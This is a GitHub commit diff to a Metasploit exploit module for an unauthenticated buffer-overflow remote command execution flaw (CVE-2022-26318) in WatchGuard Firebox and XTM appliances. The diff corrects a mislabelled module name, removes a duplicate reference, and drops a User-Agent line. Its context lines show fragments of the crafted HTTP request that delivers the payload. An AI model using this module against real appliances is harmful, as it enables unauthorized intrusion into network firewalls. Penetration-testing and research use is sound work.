Skip to content

Commit 66e7f3c

Browse files
committed
third release module
1 parent 7dbd25b commit 66e7f3c

File tree

1 file changed

+2
-4
lines changed

1 file changed

+2
-4
lines changed

modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb

Lines changed: 2 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ def initialize(info = {})
1414
super(
1515
update_info(
1616
info,
17-
'Name' => 'Geutebruck instantrec Remote Command Execution',
17+
'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',
1818
'Description' => %q{
1919
This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
2020
and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
@@ -33,8 +33,7 @@ def initialize(info = {})
3333
[ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
3434
[ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
3535
[ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
36-
[ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ],
37-
[ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2022-26318' ]
36+
[ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
3837
],
3938
'License' => MSF_LICENSE,
4039
'Platform' => [ 'unix' ],
@@ -128,7 +127,6 @@ def create_bof_payload
128127
def create_final_payload
129128
http_payload = "POST /agent/login HTTP/1.1\r\n"
130129
http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
131-
http_payload << "User-Agent: CVE-2022-26318\r\n"
132130
http_payload << "Accept-Encoding: gzip, deflate\r\n"
133131
http_payload << "Accept: */*\r\n"
134132
http_payload << "Connection: close\r\n"

0 commit comments

Comments
 (0)